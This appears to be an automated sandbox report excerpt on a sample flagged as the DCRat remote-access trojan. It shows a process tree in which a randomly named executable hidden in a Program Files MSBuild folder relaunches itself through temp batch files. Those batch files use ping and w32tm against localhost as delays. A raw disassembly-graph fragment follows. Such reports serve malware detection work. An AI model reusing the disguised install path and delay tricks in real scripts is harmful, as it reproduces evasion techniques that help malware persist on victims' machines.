                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:12:32:05
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff7ee8d0000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:12:32:14
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xa30000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.1875842793.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:12:32:16
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:12:32:22
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x890000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:12:32:23
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff7699e0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:12:32:28
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xb00000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:12:32:29
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:12:32:29
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:12:32:30
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:12:32:30
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:12:32:35
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xe90000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:12:32:36
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff7ee8d0000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:37
                                      Start time:12:32:46
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x510000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:38
                                      Start time:12:32:47
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:39
                                      Start time:12:32:47
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:12:32:47
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:41
                                      Start time:12:32:48
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:42
                                      Start time:12:32:53
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x950000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:43
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:44
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:45
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:46
                                      Start time:12:32:54
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:47
                                      Start time:12:32:59
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0xa60000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:48
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:49
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:50
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:51
                                      Start time:12:33:01
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:52
                                      Start time:12:33:06
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x9a0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:53
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:54
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:55
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:56
                                      Start time:12:33:08
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:57
                                      Start time:12:33:13
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x7c0000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:58
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:59
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:60
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:61
                                      Start time:12:33:15
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff63fcc0000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:63
                                      Start time:12:33:20
                                      Start date:03/01/2025
                                      Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                      Imagebase:0x660000
                                      File size:1'656'320 bytes
                                      MD5 hash:07A0FB75F52C87371C88F48AE80AFA1B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:64
                                      Start time:12:33:21
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                      Imagebase:0x7ff62b870000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:65
                                      Start time:12:33:21
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:66
                                      Start time:12:33:22
                                      Start date:03/01/2025
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7e2920000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:9.2%
                                        Total number of Nodes:1504
                                        Total number of Limit Nodes:43
                                        execution_graph 25331 2fb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25296 2d1025 29 API calls 25297 2ff421 21 API calls __vswprintf_c_l 25357 2ec220 93 API calls _swprintf 25332 2ef530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25374 2eff30 LocalFree 24119 2fbb30 24120 2fbb42 24119->24120 24121 2fbb39 24119->24121 24123 2fba27 24121->24123 24124 2f97e5 _abort 38 API calls 24123->24124 24125 2fba34 24124->24125 24143 2fbb4e 24125->24143 24127 2fba3c 24152 2fb7bb 24127->24152 24130 2fba53 24130->24120 24133 2fba96 24136 2f8dcc _free 20 API calls 24133->24136 24136->24130 24137 2fba91 24176 2f91a8 20 API calls __dosmaperr 24137->24176 24139 2fbada 24139->24133 24177 2fb691 26 API calls 24139->24177 24140 2fbaae 24140->24139 24141 2f8dcc _free 20 API calls 24140->24141 24141->24139 24144 2fbb5a ___scrt_is_nonwritable_in_current_image 24143->24144 24145 2f97e5 _abort 38 API calls 24144->24145 24146 2fbb64 24145->24146 24149 2fbbe8 _abort 24146->24149 24151 2f8dcc _free 20 API calls 24146->24151 24178 2f8d24 38 API calls _abort 24146->24178 24179 2fac31 EnterCriticalSection 24146->24179 24180 2fbbdf LeaveCriticalSection _abort 24146->24180 24149->24127 24151->24146 24153 2f4636 __cftof 38 API calls 24152->24153 24154 2fb7cd 24153->24154 24155 2fb7ee 24154->24155 24156 2fb7dc GetOEMCP 24154->24156 24157 2fb805 24155->24157 24158 2fb7f3 GetACP 24155->24158 24156->24157 24157->24130 24159 2f8e06 24157->24159 24158->24157 24160 2f8e44 24159->24160 24164 2f8e14 _abort 24159->24164 24182 2f91a8 20 API calls __dosmaperr 24160->24182 24162 2f8e2f RtlAllocateHeap 24163 2f8e42 24162->24163 24162->24164 24163->24133 24166 2fbbf0 24163->24166 24164->24160 24164->24162 24181 2f7a5e 7 API calls 2 library calls 24164->24181 24167 2fb7bb 40 API calls 24166->24167 24168 2fbc0f 24167->24168 24169 2fbc85 __cftof 24168->24169 24170 2fbc16 24168->24170 24173 2fbc60 IsValidCodePage 24168->24173 24183 2fb893 GetCPInfo 24169->24183 24171 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24170->24171 24172 2fba89 24171->24172 24172->24137 24172->24140 24173->24170 